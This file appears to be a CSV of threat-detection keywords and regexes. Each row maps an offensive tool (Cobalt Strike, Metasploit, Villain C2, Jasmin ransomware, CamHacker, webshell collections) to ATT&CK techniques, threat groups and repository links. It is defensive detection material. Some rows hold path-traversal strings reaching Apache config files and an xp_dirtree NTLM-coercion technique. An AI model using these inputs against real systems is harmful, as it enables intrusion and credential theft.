"*.tunneler/cf.log*",".{0,1000}\.tunneler\/cf\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4925" "*.tunneler/cloudflared*",".{0,1000}\.tunneler\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4926" "*.tunneler/loclx*",".{0,1000}\.tunneler\/loclx.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4927" "*.tunneler/loclx.log*",".{0,1000}\.tunneler\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","4928" "*.txt shellcode hta*",".{0,1000}\.txt\sshellcode\shta.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4930" "*.txt shellcode macro*",".{0,1000}\.txt\sshellcode\smacro.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4931" "*.txt shellcode ms*",".{0,1000}\.txt\sshellcode\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4932" "*.txt.bat*",".{0,1000}\.txt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4933" "*.txt.dll*",".{0,1000}\.txt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4934" "*.txt.exe*",".{0,1000}\.txt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4935" "*.txt.htm*",".{0,1000}\.txt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4936" "*.txt.iso*",".{0,1000}\.txt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4937" "*.txt.jar*",".{0,1000}\.txt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4938" "*.txt.jasmin*",".{0,1000}\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4939" "*.txt.js",".{0,1000}\.txt\.js","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4940" "*.txt.sfx*",".{0,1000}\.txt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4941" "*.txt.vbs*",".{0,1000}\.txt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4942" "*.unconstrained.txt*",".{0,1000}\.unconstrained\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4943" "*.videos.123456.*",".{0,1000}\.videos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4946" "*.villain_core*",".{0,1000}\.villain_core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","4947" "*.vpn.123456.*",".{0,1000}\.vpn\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4949" "*.webmail.123456.*",".{0,1000}\.webmail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4951" 
"*.wiki.123456.*",".{0,1000}\.wiki\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4952" "*.win10.config.fireeye*",".{0,1000}\.win10\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red 
teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","4953" "*.win7.config.fireeye*",".{0,1000}\.win7\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","4954" "*.WriteLine(""SharpRDP"")*",".{0,1000}\.WriteLine\(\""SharpRDP\""\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4955" "*.xls.bat*",".{0,1000}\.xls\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4957" "*.xls.dll*",".{0,1000}\.xls\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4958" "*.xls.exe*",".{0,1000}\.xls\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4959" "*.xls.htm*",".{0,1000}\.xls\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions 
files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4960" "*.xls.iso*",".{0,1000}\.xls\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4961" "*.xls.jar*",".{0,1000}\.xls\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4962" "*.xls.js*",".{0,1000}\.xls\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4963" "*.xls.sfx*",".{0,1000}\.xls\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4964" "*.xls.vbs*",".{0,1000}\.xls\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4965" "*.xlsx.bat*",".{0,1000}\.xlsx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4966" "*.xlsx.dll*",".{0,1000}\.xlsx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4967" "*.xlsx.exe*",".{0,1000}\.xlsx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4968" "*.xlsx.htm*",".{0,1000}\.xlsx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4969" "*.xlsx.iso*",".{0,1000}\.xlsx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4970" "*.xlsx.jar*",".{0,1000}\.xlsx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4971" "*.xlsx.jasmin*",".{0,1000}\.xlsx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4972" "*.xlsx.js*",".{0,1000}\.xlsx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4973" "*.xlsx.sfx*",".{0,1000}\.xlsx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4974" "*.xlsx.vbs*",".{0,1000}\.xlsx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4975" "*.xp_dirtree *\*",".{0,1000}\.xp_dirtree\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4976" "*.zip.exe*",".{0,1000}\.zip\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4977" "*.zip.iso*",".{0,1000}\.zip\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4978" "*/#kali-installer-images*",".{0,1000}\/\#kali\-installer\-images.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","4982" 
"*/*_priv_esc.*",".{0,1000}\/.{0,1000}_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4984" "*/*SandboxEscapes/*",".{0,1000}\/.{0,1000}SandboxEscapes\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4985" "*/../../../../../../../../../../../../../../etc/apache/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4986" "*/../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/apache2\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4987" "*/../../../../../../../../../../../../../../etc/http/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4988" "*/../../../../../../../../../../../../../../etc/http/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/http\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4989" "*/../../../../../../../../../../../../../../etc/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4990" "*/../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf*",".{0,1000}\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/httpd\/conf\/httpd\.conf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4991" 
